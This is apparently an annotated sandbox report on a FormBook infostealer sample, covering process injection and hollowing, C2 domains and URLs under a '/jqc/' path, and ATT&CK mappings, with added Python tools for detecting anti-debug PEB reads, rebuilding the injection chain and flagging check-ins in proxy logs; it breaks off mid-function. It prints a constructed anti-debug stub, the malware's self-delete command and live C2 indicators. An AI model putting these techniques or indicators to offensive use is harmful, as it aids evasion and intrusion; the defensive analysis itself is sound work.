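from __future__ import annotations

import re
from dataclasses import dataclass

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_POINTER_OFFSET = 0x30   # TEB.ProcessEnvironmentBlock (32-bit TEB)
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# Two encodings of "mov r32, dword ptr fs:[disp32]" (0x64 = FS segment override):
#   64 A1 <disp32>      short form, destination fixed to eax            (6 bytes)
#   64 8B /r <disp32>   ModRM mod=00 rm=101 (disp32, no base), any r32  (7 bytes)
SHORT_FORM = re.compile(rb"\x64\xa1(.{4})", re.DOTALL)
MODRM_FORM = re.compile(rb"\x64\x8b([\x05\x0d\x15\x1d\x25\x2d\x35\x3d])(.{4})", re.DOTALL)


@dataclass(frozen=True)
class PebRead:
    offset: int     # offset of the fs:[30h] load in the blob
    register: str   # register that receives the PEB pointer
    length: int     # instruction length, used to locate the next instruction


def find_peb_reads(code: bytes) -> list[PebRead]:
    """Return every fs:[0x30] load in address order. Loads from other fs:
    offsets (e.g. fs:[0x18], the TEB self pointer) are deliberately ignored."""
    hits = []
    for m in SHORT_FORM.finditer(code):
        if int.from_bytes(m.group(1), "little") == PEB_POINTER_OFFSET:
            hits.append(PebRead(m.start(), "eax", 6))
    for m in MODRM_FORM.finditer(code):
        if int.from_bytes(m.group(2), "little") == PEB_POINTER_OFFSET:
            hits.append(PebRead(m.start(), REG32[(m.group(1)[0] >> 3) & 7], 7))
    return sorted(hits, key=lambda h: h.offset)


def peb_field_read_next(code: bytes, hit: PebRead) -> str | None:
    """Name the PEB field dereferenced by the instruction right after `hit`,
    if it is `movzx r32, byte ptr [base+disp8]` (0F B6 /r) or
    `mov r32, [base+disp8]` (8B /r) with base = the register that just got
    the PEB pointer. Only the mod=01 (disp8) form is decoded; an esp base
    would need a SIB byte and is not handled."""
    base = REG32.index(hit.register)
    p = hit.offset + hit.length
    if code[p:p + 2] == b"\x0f\xb6" and len(code) >= p + 4:
        modrm, disp = code[p + 2], code[p + 3]
    elif code[p:p + 1] == b"\x8b" and len(code) >= p + 3:
        modrm, disp = code[p + 1], code[p + 2]
    else:
        return None
    if (modrm >> 6) != 0b01 or (modrm & 7) != base:
        return None
    return PEB_FIELDS.get(disp, f"PEB+0x{disp:02x}")


def summarize(code: bytes) -> list[tuple[int, str, str | None]]:
    """(offset, register, PEB field read next) for every PEB-pointer load."""
    return [(h.offset, h.register, peb_field_read_next(code, h)) for h in find_peb_reads(code)]


# Constructed anti-debug stub: the classic BeingDebugged / NtGlobalFlag pair.
SAMPLE_CODE = bytes.fromhex(
    "64a130000000"    # mov   eax, fs:[30h]            ; eax = PEB
    "0fb64002"        # movzx eax, byte ptr [eax+2]    ; PEB.BeingDebugged
    "85c0"            # test  eax, eax
    "7510"            # jne   debugger_present
    "648b0d30000000"  # mov   ecx, fs:[30h]            ; ecx = PEB
    "8b4168"          # mov   eax, [ecx+68h]           ; PEB.NtGlobalFlag
    "c3"              # ret
)

if __name__ == "__main__":
    for offset, reg, field in summarize(SAMPLE_CODE):
        print(f"+0x{offset:04x}: mov {reg}, fs:[30h]  -> next reads {field or 'n/a'}")
```

Run against a dumped code section (for example the 8.2.AddInProcess32.exe.400000.0.unpack file this report offers), the scanner reproduces the per-function hit counts above and, more usefully, tells you which of the loads feed a BeingDebugged or NtGlobalFlag check rather than a benign Ldr or ProcessHeap lookup. Byte-pattern matching has no instruction-boundary awareness, so a `64 A1` inside data can produce a false hit; treat the output as leads to confirm in a disassembler.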

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 91.195.241.137 port 80
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\BLESSINGS.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\BLESSINGS.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: D90000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\BLESSINGS.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\BLESSINGS.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\user\Desktop\BLESSINGS.exe | Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: DAB008
Source: C:\Users\user\Desktop\BLESSINGS.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 0000000A.00000000.426549964.0000000000EE0000.00000002.00000001.sdmp, raserver.exe, 0000000F.00000002.686947292.0000000002DB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\BLESSINGS.exe | Queries volume information: C:\Users\user\Desktop\BLESSINGS.exe VolumeInformation
Source: C:\Users\user\Desktop\BLESSINGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\BLESSINGS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\BLESSINGS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
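Read together, the evidence lines in this section describe a four-stage chain: BLESSINGS.exe allocates RWX memory at 0x400000 in the dropped AddInProcess32.exe and writes a PE image there (the write whose value starts with 4D5A; this is the region the report later dumps as 8.2.AddInProcess32.exe.400000.0.unpack); AddInProcess32.exe maps RWX sections into explorer.exe and raserver.exe, unmaps raserver.exe's original image at 0xD90000 (hollowing) and queues an APC in explorer.exe; explorer.exe then carries the C2 traffic and raserver.exe finally spawns cmd.exe to delete the dropped file. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines in the report's "Source: <process><operation>: <detail>" form (both the fused form produced by text extraction and a form with a " | " separator) into source-to-target edges and tags each target with the injection primitive the operation implies. The input lines are copied from the section above; the technique labels are this example's own wording, not Joe Sandbox signature names, and the inference rules (for example "MZ written at the allocation base means a PE image") are assumptions the example states in comments.

```python
"""Rebuild the process-injection chain from Joe Sandbox 'Source:' evidence lines.

Added example, not part of the Joe Sandbox report. REPORT_LINES are copied from
the report; the parser accepts the fused text-extraction form
("...exeMemory written: ...") as well as a " | " separated form.
"""
from __future__ import annotations

import re
from collections import defaultdict

OPERATIONS = (
    "Memory allocated", "Memory written", "Section loaded", "Thread APC queued",
    "Thread register set", "Section unmapped", "Process created",
)
LINE_RE = re.compile(
    r"^Source: (?P<src>\S+?\.exe)(?: \| )?(?P<op>" + "|".join(OPERATIONS) + r"): (?P<rest>.*)$"
)
# Layout of the detail field for each operation, as printed by the report.
DETAIL_RE = {
    "Memory allocated": re.compile(r"^(?P<tgt>\S+) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$"),
    "Memory written": re.compile(r"^(?P<tgt>\S+) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"),
    "Section loaded": re.compile(r"^unknown target: (?P<tgt>\S+) protection: (?P<prot>.+)$"),
    "Thread APC queued": re.compile(r"^target process: (?P<tgt>\S+)$"),
    "Thread register set": re.compile(r"^target process: (?P<tgt>\d+)$"),
    "Section unmapped": re.compile(r"^(?P<tgt>\S+) base address: (?P<base>[0-9A-Fa-f]+)$"),
    "Process created": re.compile(r"^(?P<tgt>\S+)(?: (?P<cmdline>.*))?$"),
}

REPORT_LINES = [  # copied verbatim from the report's HIPS / PFW section
    r"Source: C:\Users\user\Desktop\BLESSINGS.exeMemory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread register set: target process: 3440",
    r"Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3440",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeThread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: D90000",
    r"Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000",
    r"Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000",
    r"Source: C:\Users\user\Desktop\BLESSINGS.exeMemory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: DAB008",
    r"Source: C:\Users\user\Desktop\BLESSINGS.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe",
    r"Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'",
]


def short_name(target: str) -> str:
    """Reduce a path to its file name; a bare PID (as in 'Thread register set') becomes 'pid <n>'."""
    return f"pid {target}" if target.isdigit() else target.rsplit("\\", 1)[-1]


def parse_report_lines(lines: list[str]) -> list[dict]:
    """Turn evidence lines into {src, op, tgt, ...detail} events; unparseable lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = DETAIL_RE[m["op"]].match(m["rest"])
        if not d:
            continue
        event = {"src": short_name(m["src"]), "op": m["op"], "tgt": short_name(d["tgt"])}
        event.update({k: v for k, v in d.groupdict().items() if k != "tgt" and v is not None})
        events.append(event)
    return events


def injection_edges(events: list[dict]) -> dict[tuple[str, str], list[str]]:
    """(source, target) -> sorted list of operations the source performed on the target."""
    edges = defaultdict(set)
    for ev in events:
        edges[(ev["src"], ev["tgt"])].add(ev["op"])
    return {edge: sorted(ops) for edge, ops in edges.items()}


def classify(events: list[dict]) -> dict[str, list[str]]:
    """Tag each target with the injection primitive each event implies.
    Labels and rules are this example's own (assumptions), not Joe Sandbox signatures."""
    techniques = defaultdict(set)
    for ev in events:
        op, tgt = ev["op"], ev["tgt"]
        if op == "Memory allocated" and "execute" in ev.get("prot", ""):
            techniques[tgt].add("RWX memory allocated")
        elif op == "Memory written" and ev.get("magic", "").upper().startswith("4D5A"):
            techniques[tgt].add("PE image written (MZ header)")   # 4D5A = "MZ"
        elif op == "Section loaded" and "execute" in ev.get("prot", ""):
            techniques[tgt].add("RWX section mapped")
        elif op == "Section unmapped":
            techniques[tgt].add("original image unmapped (hollowing)")
        elif op == "Thread APC queued":
            techniques[tgt].add("APC queued")
        elif op == "Thread register set":
            techniques[tgt].add("thread context modified")
    return {tgt: sorted(labels) for tgt, labels in techniques.items()}


if __name__ == "__main__":
    evts = parse_report_lines(REPORT_LINES)
    for (src, tgt), ops in injection_edges(evts).items():
        print(f"{src} -> {tgt}: {', '.join(ops)}")
    for tgt, labels in classify(evts).items():
        print(f"{tgt}: {'; '.join(labels)}")
```

Feeding the section's lines through this yields the chain as a graph rather than a flat list: BLESSINGS.exe -> AddInProcess32.exe (allocate, write, create), AddInProcess32.exe -> explorer.exe (RWX section, APC) and -> raserver.exe (RWX section, unmap), raserver.exe -> cmd.exe (create). The "Thread register set" lines only carry a PID (3440), so that target stays a PID node; correlating it to a process name needs the report's process-tree section, which these lines do not contain.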

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | the same ten file sources (eight memory dumps from processes 1, 8 and F, plus 8.2.AddInProcess32.exe.400000.0.unpack and 8.2.AddInProcess32.exe.400000.0.raw.unpack) already listed under Stealing of Sensitive Information above

Mitre Att&ck Matrix

Techniques the report maps the observed behaviour to, grouped by tactic. The trailing digits are the report's superscript signature-hit markers, reproduced as printed; matrix cells without a marker are the unmodified ATT&CK template and are omitted here.

Execution: Shared Modules 1
Privilege Escalation: Process Injection 812
Defense Evasion: Rootkit 1; Masquerading 1; Virtualization/Sandbox Evasion 3; Disable or Modify Tools 1; Process Injection 812; Deobfuscate/Decode Files or Information 1; Hidden Files and Directories 1; Obfuscated Files or Information 3; Software Packing 1
Credential Access: Credential API Hooking 1; Input Capture 1
Discovery: Security Software Discovery 121; Virtualization/Sandbox Evasion 3; Process Discovery 2; Application Window Discovery 1; Remote System Discovery 1; System Information Discovery 112
Collection: Credential API Hooking 1; Input Capture 1; Archive Collected Data 1
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 2
No techniques were flagged under Initial Access, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects or Impact.

Behavior Graph

Behavior Graph ID: 339345 | Sample: BLESSINGS.exe | Start date: 13/01/2021 | Architecture: WINDOWS | Score: 100

Process tree reconstructed from the graph, with the signatures and network indicators the graph attaches to each node:

BLESSINGS.exe (started)
  DNS: www.hotvidzhub.download
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
  Dropped: C:\Users\user\AppData\...\AddInProcess32.exe (PE32); C:\Users\user\AppData\...\BLESSINGS.exe.log (ASCII)
  Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign process
  -> AddInProcess32.exe (started)
     Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
     -> explorer.exe (injected)
        Network: www.quintred.com 91.195.241.137, port 49755 -> 80, SEDO-ASDE, Germany; www.toweroflifeinc.com
        Signature: System process connects to network (likely due to code injection or exploit)
        -> raserver.exe (started)
           Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
           -> cmd.exe (started)
              -> conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner
BLESSINGS.exe | 45% | Virustotal
BLESSINGS.exe | 15% | ReversingLabs
BLESSINGS.exe | 100% | Joe Sandbox ML

Dropped Files

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | 0% | ReversingLabs

Unpacked PE Files

Source | Detection | Scanner | Label
8.2.AddInProcess32.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

The dropped AddInProcess32.exe scores 0% on disk while the image unpacked from its memory at 0x400000 is detected at 100%, which is consistent with the "process hollowing" signature: the file on disk serves as the host image, and the payload only becomes visible once it has been written into that process.

Domains

Source | Detection | Scanner
www.quintred.com | 4% | Virustotal
www.hotvidzhub.download | 0% | Virustotal

URLs

Every URL below scored 0% with the named scanner. Entries that end in "Referer:" or that carry a second hostname after the path appear to be adjacent strings that the memory-string extractor ran together; they are reproduced as reported.

Avira URL Cloud: safe
• http://www.the343radio.com/jqc/
• http://www.droriginals.com
• http://www.novergi.com/jqc/
• http://www.the343radio.com
• http://www.gabriellagullberg.comReferer:
• http://www.kornteengoods.com/jqc/
• http://www.screwtaped.comReferer:
• http://www.11sxsx.com/jqc/
• http://www.quintred.comReferer:
• http://www.sterlworldshop.comReferer:
• http://www.margosbest.com/jqc/www.the343radio.com
• http://www.novergi.com
• http://www.registeredagentfirm.comReferer:
• http://www.hotvidzhub.download/jqc/www.internetmarkaching.com
• http://www.internetmarkaching.com/jqc/
• http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P
• http://www.screwtaped.com/jqc/
• http://www.internetmarkaching.comReferer:
• http://www.novergi.com/jqc/www.hotvidzhub.download
• http://www.margosbest.com/jqc/
• http://www.novergi.comReferer:
• http://www.cositasdepachecos.comReferer:
• http://www.cositasdepachecos.com
• http://www.cositasdepachecos.com/jqc/www.margosbest.com
• http://www.droriginals.com/jqc/www.kornteengoods.com
• http://www.screwtaped.com
• http://www.asacal.com/jqc/:
• http://www.11sxsx.comReferer:
• http://www.asacal.comReferer:
• http://www.11sxsx.com/jqc/www.sterlworldshop.com
• http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com
• http://www.hotvidzhub.downloadReferer:
• http://www.quintred.com/jqc/www.novergi.com
• http://www.kornteengoods.com/jqc/www.screwtaped.com
• http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com
• http://www.toweroflifeinc.com/jqc/
• http://www.hotvidzhub.download
• http://www.gabriellagullberg.com/jqc/
• http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
• http://www.gabriellagullberg.com
• http://www.droriginals.comReferer:
• http://www.sterlworldshop.com/jqc/
• http://www.toweroflifeinc.comReferer:
• http://www.margosbest.com
• http://www.toweroflifeinc.com
• http://www.registeredagentfirm.com
• http://www.kornteengoods.com
• http://www.quintred.com
• http://www.cositasdepachecos.com/jqc/
• http://www.registeredagentfirm.com/jqc/www.asacal.com
• http://www.screwtaped.com/jqc/www.11sxsx.com
• http://www.sterlworldshop.com
• http://www.registeredagentfirm.com/jqc/
• http://www.toweroflifeinc.com/jqc/www.quintred.com

URL Reputation: safe
• http://www.founder.com.cn/cn/bThe
• http://www.tiro.com
• http://ns.adobe.c/g
• http://www.goodfont.co.kr
• http://www.sajatypeworks.com
• http://www.typography.netD
• http://www.founder.com.cn/cn/cThe
• http://www.galapagosdesign.com/staff/dennis.htm
• http://fontfabrik.com
• http://www.galapagosdesign.com/DPlease
• http://www.sandoll.co.kr
• http://www.urwpp.deDPlease
• http://www.zhongyicts.com.cn
• http://www.sakkal.com
• http://www.carterandcone.coml
• http://www.founder.com.cn/cn

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.quintred.com | 91.195.241.137 | true | true | (none) | unknown
www.toweroflifeinc.com | unknown | unknown | true | (none) | unknown
www.hotvidzhub.download | unknown | unknown | true | (none) | unknown

Only www.quintred.com resolved during the run, to 91.195.241.137 in AS47846 (SEDO-ASDE). Together with the sedo.com sales-lander URL for quintred.com found later in raserver.exe memory, this indicates that the domain was parked at analysis time and that the HTTP reply was a parking page rather than a live command-and-control response; the other two domains did not resolve.

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Every entry was rated Malicious: false. Entries are grouped by the memory dump they were extracted from.

Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp
Antivirus detection: Avira URL Cloud: safe; Reputation: unknown
• http://www.the343radio.com/jqc/
• http://www.droriginals.com
• http://www.novergi.com/jqc/
• http://www.the343radio.com
• http://www.gabriellagullberg.comReferer:
• http://www.kornteengoods.com/jqc/
• http://www.screwtaped.comReferer:
• http://www.11sxsx.com/jqc/
• http://www.quintred.comReferer:
• http://www.sterlworldshop.comReferer:
• http://www.margosbest.com/jqc/www.the343radio.com
• http://www.novergi.com
• http://www.registeredagentfirm.comReferer:
• http://www.hotvidzhub.download/jqc/www.internetmarkaching.com
• http://www.internetmarkaching.com/jqc/
• http://www.screwtaped.com/jqc/
• http://www.internetmarkaching.comReferer:
• http://www.novergi.com/jqc/www.hotvidzhub.download
• http://www.margosbest.com/jqc/
• http://www.novergi.comReferer:
• http://www.cositasdepachecos.comReferer:
• http://www.cositasdepachecos.com
• http://www.cositasdepachecos.com/jqc/www.margosbest.com
• http://www.droriginals.com/jqc/www.kornteengoods.com
• http://www.screwtaped.com
• http://www.asacal.com/jqc/:
• http://www.11sxsx.comReferer:
• http://www.asacal.comReferer:
• http://www.11sxsx.com/jqc/www.sterlworldshop.com
• http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com
• http://www.hotvidzhub.downloadReferer:
• http://www.quintred.com/jqc/www.novergi.com
• http://www.kornteengoods.com/jqc/www.screwtaped.com
• http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com
• http://www.toweroflifeinc.com/jqc/
• http://www.hotvidzhub.download
• http://www.gabriellagullberg.com/jqc/
• http://www.sterlworldshop.com/jqc/www.registeredagentfirm.com
• http://www.gabriellagullberg.com
• http://www.droriginals.comReferer:
• http://www.sterlworldshop.com/jqc/
• http://www.toweroflifeinc.comReferer:
• http://www.margosbest.com
• http://www.toweroflifeinc.com
• http://www.registeredagentfirm.com
• http://www.kornteengoods.com
• http://www.quintred.com
• http://www.cositasdepachecos.com/jqc/
• http://www.registeredagentfirm.com/jqc/www.asacal.com
• http://www.screwtaped.com/jqc/www.11sxsx.com
• http://www.sterlworldshop.com
• http://www.registeredagentfirm.com/jqc/
• http://www.toweroflifeinc.com/jqc/www.quintred.com
• http://www.11sxsx.com
• http://www.margosbest.comReferer:
• http://www.the343radio.com/jqc/www.droriginals.com
• http://www.droriginals.com/jqc/
• http://www.asacal.com
• http://www.quintred.com/jqc/
• http://www.internetmarkaching.com
• http://www.hotvidzhub.download/jqc/
• http://www.kornteengoods.comReferer:
• http://www.the343radio.comReferer:
• http://www.asacal.com/jqc/

Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp
No antivirus detection; Reputation: high
• http://www.fontbureau.com/designersG
• http://www.fontbureau.com/designers/?
• http://www.fontbureau.com/designers?
• http://www.fontbureau.com/designers
• http://www.fonts.com
• http://www.apache.org/licenses/LICENSE-2.0
• http://www.fontbureau.com
• http://www.fontbureau.com/designers/cabarga.htmlN
• http://www.fontbureau.com/designers/frere-jones.html
• http://www.fontbureau.com/designers8
Antivirus detection: URL Reputation: safe; Reputation: unknown
• http://www.founder.com.cn/cn/bThe
• http://www.tiro.com
• http://www.goodfont.co.kr
• http://www.sajatypeworks.com
• http://www.typography.netD
• http://www.founder.com.cn/cn/cThe
• http://www.galapagosdesign.com/staff/dennis.htm
• http://fontfabrik.com
• http://www.galapagosdesign.com/DPlease
• http://www.sandoll.co.kr
• http://www.urwpp.deDPlease
• http://www.zhongyicts.com.cn
• http://www.sakkal.com
• http://www.carterandcone.coml
• http://www.founder.com.cn/cn
• http://www.jiyu-kobo.co.jp/

Source: BLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmp
Antivirus detection: URL Reputation: safe; Reputation: unknown
• http://ns.adobe.c/g

Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmp
No antivirus detection; Reputation: high
• http://www.autoitscript.com/autoit3/J

Source: raserver.exe, 0000000F.00000002.688978959.0000000004F1F000.00000004.00000001.sdmp
No antivirus detection; Reputation: high
• https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lander
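The URL strings from the injected explorer.exe dump share one path, "/jqc/", across a rotating list of hosts, and the single contacted URL shows the request shape: that path followed by one query parameter carrying a base64-looking blob and a second short parameter. That is enough to derive a proxy-log detection. The following is an added example written for this report, not Joe Sandbox code: MEMORY_STRINGS is a subset copied from the URL tables above (fused entries included), the parameter-shape regex is generalised from the one observed request, and the proxy log lines are constructed.

```python
"""Derive a proxy-log detection from the URL strings the sandbox extracted
from the injected explorer.exe process. Added example, not Joe Sandbox code.
MEMORY_STRINGS is a subset copied from the report's URL tables; PROXY_LOG
lines are constructed."""
import re
from collections import Counter
from urllib.parse import urlsplit

MEMORY_STRINGS = [
    "http://www.the343radio.com/jqc/",
    "http://www.gabriellagullberg.comReferer:",           # URL fused with the next string
    "http://www.margosbest.com/jqc/www.the343radio.com",  # path fused with the next host
    "http://www.quintred.com/jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P",
    "http://www.fontbureau.com/designers",                # font metadata, unrelated
    "http://www.asacal.com/jqc/:",
    "http://www.hotvidzhub.download/jqc/www.internetmarkaching.com",
]

HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]+$")
# Check-in shape generalised from the one observed request: a parameter
# carrying a base64-looking value, optionally a second short parameter.
QUERY_RE = re.compile(r"^[A-Za-z0-9]+=[A-Za-z0-9+/]+={0,2}(?:&[A-Za-z0-9]+=[A-Za-z0-9]+)?$")


def unfuse(s):
    """Strip the 'Referer:' the string extractor glued onto some URLs."""
    return s[:-len("Referer:")] if s.endswith("Referer:") else s


def campaign_path(strings):
    """The first path segment shared by the most hosts ('/jqc/' in this report)."""
    counts = Counter()
    for s in strings:
        m = re.match(r"^(/[A-Za-z0-9]+/)", urlsplit(unfuse(s)).path)
        if m:
            counts[m.group(1)] += 1
    return counts.most_common(1)[0][0] if counts else None


def hosts_with_path(strings, path):
    """Hosts carrying the campaign path, plus hosts recovered from fused
    '<path>www.next.host' entries."""
    hosts = set()
    for s in strings:
        u = urlsplit(unfuse(s))
        if u.hostname and u.path.startswith(path):
            hosts.add(u.hostname)
            tail = u.path[len(path):]
            if HOST_RE.match(tail):
                hosts.add(tail)
    return hosts


def is_checkin(url, path, hosts):
    """True for a request to a known host with the campaign path and check-in query."""
    u = urlsplit(url)
    return u.hostname in hosts and u.path == path and bool(QUERY_RE.match(u.query))


def scan_proxy_log(lines, path, hosts):
    """Return (timestamp, client, url) for each GET matching the check-in shape.
    Log format assumed: '<timestamp> <client> <method> <url> <status>'."""
    hits = []
    for line in lines:
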